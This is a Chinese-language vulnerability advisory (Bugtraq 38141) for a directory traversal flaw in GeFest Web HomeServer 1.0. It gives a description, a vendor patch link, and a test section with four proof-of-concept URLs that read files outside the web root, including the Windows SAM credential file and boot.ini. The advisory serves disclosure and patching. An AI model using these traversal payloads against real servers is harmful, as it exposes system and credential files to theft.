发布日期：2010-02-08
更新日期：2010-02-09

受影响系统：

GZM Web GeFest Web HomeServer 1.0

不受影响系统：

GZM Web GeFest Web HomeServer 1.2

描述：

---

BUGTRAQ  ID: 38141

Gefest Web Home Server是设计有图形用户界面的简单web服务器。

远程攻击者可以通过向Gefest Web Home Serve提交特制URI请求执行目录遍历攻击，访问Web根目录外的文件。

<*来源：MarkoT
  
  链接：http://marc.info/?l=bugtraq&m=126564766830066&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini

建议：

---

厂商补丁：

GZM Web
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://clearweb.org.ua/gefest/GefestWS_win_jre.exe

浏览次数：2369
严重程度：0（网友投票）